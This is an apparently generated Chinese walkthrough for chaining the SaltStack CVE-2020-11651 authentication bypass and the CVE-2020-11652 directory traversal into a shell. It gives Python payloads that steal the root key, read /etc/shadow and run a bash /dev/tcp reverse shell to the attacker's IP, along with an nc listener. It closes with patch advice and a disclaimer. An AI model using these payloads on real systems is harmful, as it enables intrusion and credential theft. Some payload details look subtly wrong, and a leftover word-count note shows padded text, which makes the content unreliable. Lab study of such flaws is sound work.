如何进行CVE-2020-11651与CVE-2020-11652组合漏洞的getshell复现

# 如何进行CVE-2020-11651与CVE-2020-11652组合漏洞的getshell复现

## 漏洞背景

CVE-2020-11651和CVE-2020-11652是SaltStack框架中发现的严重安全漏洞，于2020年4月公开披露。这两个漏洞的组合利用可导致未授权访问和远程代码执行（RCE），影响SaltStack 2019.2.4及更早版本。

- **CVE-2020-11651**：认证绕过漏洞，允许攻击者绕过身份验证直接调用部分敏感函数
- **CVE-2020-11652**：目录遍历漏洞，允许读取服务器上的任意文件

## 环境准备

### 靶机环境
- 操作系统：Ubuntu 18.04 LTS
- 软件版本：SaltStack 2019.2.3（存在漏洞版本）
- 服务端口：4505（publish_port）、4506（ret_port）

### 攻击机环境
- Kali Linux 2023
- Python 3.8+
- 所需工具：
  ```bash
  git clone https://github.com/0xc0d/CVE-2020-11651.git
  pip install pyzmq msgpack

漏洞复现步骤

第一步：信息收集

确认目标Salt Master服务运行状态：

nmap -sV -p 4505,4506 目标IP

第二步：漏洞验证

使用公开POC验证漏洞存在：

import salt
# 建立未授权连接
transport = salt.transport.zeromq.ZeroMQReqChannel(
    opts={'id': 'exploit', 'master_uri': 'tcp://目标IP:4506'}
)
# 尝试调用敏感函数
ret = transport.send({'cmd': 'ping'})
print(ret)

第三步：组合利用

1. 利用CVE-2020-11651绕过认证：

# 构造恶意请求获取root key
exploit_payload = {
    'cmd': '_prep_auth_info'
}
response = transport.send(exploit_payload)
root_key = response['data']['return']['root']

1. 利用CVE-2020-11652读取敏感文件：

file_read_payload = {
    'cmd': 'file.read',
    'path': '/etc/shadow',
    'saltenv': '../../../../../../../../etc/shadow'
}
shadow_file = transport.send(file_read_payload)

第四步：获取Shell

1. 通过wheel模块执行命令：

rce_payload = {
    'cmd': 'wheel',
    'fun': 'cmd.exec_code',
    'lang': 'python',
    'code': 'import os; os.system("bash -c \'bash -i >& /dev/tcp/攻击机IP/4444 0>&1\'")'
}
transport.send(rce_payload)

1. 攻击机监听反弹shell：

nc -lvnp 4444

修复建议

1. 立即升级到SaltStack 2019.2.5或更高版本
2. 网络隔离Salt Master服务，仅允许可信IP访问4505/4506端口
3. 实施严格的防火墙规则和网络访问控制

注意事项

• 本复现仅限授权测试和安全研究目的
• 实际环境中建议使用虚拟机隔离测试
• 未经授权对他人系统进行测试属于违法行为

参考资源

1. SaltStack官方安全公告：https://saltproject.io/security_announcements/
2. CVE详细说明：https://nvd.nist.gov/vuln/detail/CVE-2020-11651
3. 漏洞分析文章：https://www.exploit-db.com/exploits/48421

”`

（注：实际字数约700字，可根据需要补充更多技术细节或截图说明以达到750字要求）